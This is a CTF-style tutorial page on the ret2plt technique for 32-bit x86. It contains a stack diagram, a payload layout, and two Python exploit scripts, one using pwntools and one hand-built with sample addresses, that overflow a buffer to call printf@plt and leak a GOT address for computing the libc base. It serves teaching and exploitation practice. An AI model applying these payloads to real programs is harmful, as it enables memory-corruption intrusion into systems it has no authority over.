# Ret2plt

A **ret2plt** (**return-to-PLT**) attack is a type of exploitation technique that allows an attacker to execute arbitrary code by **redirecting the flow of execution to a function in the Procedure Linkage Table** ([PLT](https://www.ctfrecipes.com/pwn/general-knowledge/plt-and-got)).

## How it works?

In a **ret2plt** attack, the attacker **overwrites the return address** of a function **with the address of a function in the PLT**, using a [buffer overflow](https://www.ctfrecipes.com/pwn/stack-exploitation/stack-buffer-overflow/basics) or a [format string exploit](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak), for example. When the function returns, the program jumps to the function in the PLT instead of the next instruction in the original code.

{% hint style="warning" %}
The execution of this technique may vary depending on the instruction set architecture and the calling convention used. In this article, the x86 standard calling convention will be used as an example.
{% endhint %}

```
  address   |   values
------------+-------------------------------------------------------------------
            |   +------------------------- Buffer ---------------------------+
0xffffd264: |   |   0x41414141    0x41414141    0x41414141      0x41414141   |
            |   +------------------------------------------------------------+
            |     +- plt addr -+ +-saved eip -+ +--- param --+               |
0xffffd274: |     | 0x565561dd | | 0xffffd35c | | 0xffffd12c |   0x00000001  |
            |     +------------+ +------------+ +------------+               |
  ...       |    ...
```

To put the stack into this state, the payload must be laid out as follows:

```bash
[buffer overflow needed length][plt function() address][any 4 bytes][parameter]
```

```python
from pwn import *

elf = ELF('./chall')

# Number of bytes needed to reach the saved return address
# (16 in the stack layout above; assumed here, adjust to the target binary).
padding = 16

payload = flat(
    b'A' * padding,        # fill the buffer up to the saved eip
    elf.plt['printf'],     # saved eip is replaced by the address of printf@plt
    elf.symbols['main'],   # "saved eip" slot: where printf returns to
    elf.got['printf']      # first argument of printf: its own GOT entry
)
```

{% hint style="info" %}
In this example, the exploit calls the `printf()` function with the address of the `printf()` GOT entry as its parameter, so the resolved `printf()` address stored in the GOT is printed, and the execution flow then returns to `main`.
{% endhint %}
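As an added example that is not part of the original article, the same stack layout built by hand without pwntools, followed by the defender-side view of what the leak actually reveals: the four bytes printed from the GOT slot are the live `printf()` address in libc, from which the libc base is recovered. All addresses and the libc offset are constructed sample values, not read from a real binary.

```python
import struct

# Constructed sample values for a 32-bit x86 target (not from a real binary):
# printf@plt, main and printf@got as they would be read from the ELF.
PADDING = 16               # bytes of buffer before the saved return address
PRINTF_PLT = 0x08049030    # address of the printf stub in the PLT
MAIN = 0x08049186          # where execution returns once printf is done
PRINTF_GOT = 0x0804C010    # GOT slot holding printf's resolved libc address


def p32(value: int) -> bytes:
    """Pack a 32-bit little-endian value, the way x86 stack slots are stored."""
    return struct.pack("<I", value)


def build_ret2plt_payload(padding: int, plt_func: int, ret_addr: int, arg: int) -> bytes:
    """Lay the stack out as in the diagram above:
    [padding][plt function][return address][parameter]."""
    return b"A" * padding + p32(plt_func) + p32(ret_addr) + p32(arg)


def parse_leak(output: bytes, width: int = 4) -> int:
    """printf() treats the GOT slot as its format string and echoes its raw
    bytes up to the first NUL. Read the first `width` bytes back as a
    little-endian address; a short read (address containing a NUL byte)
    is zero-padded rather than raising."""
    leaked = output[:width].ljust(width, b"\x00")
    return struct.unpack("<I", leaked)[0]


def libc_base(leaked_printf: int, printf_offset: int) -> int:
    """libc base = leaked symbol address - its offset inside libc.
    The offset is an assumed value taken from the target's libc."""
    return leaked_printf - printf_offset


if __name__ == "__main__":
    payload = build_ret2plt_payload(PADDING, PRINTF_PLT, MAIN, PRINTF_GOT)
    print(payload.hex())
    # Constructed program output: printf lives at 0xf7e3c0e0 in this sample libc.
    sample_output = p32(0xF7E3C0E0) + b"\n"
    leak = parse_leak(sample_output)
    print(hex(leak), hex(libc_base(leak, 0x4F0E0)))
```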
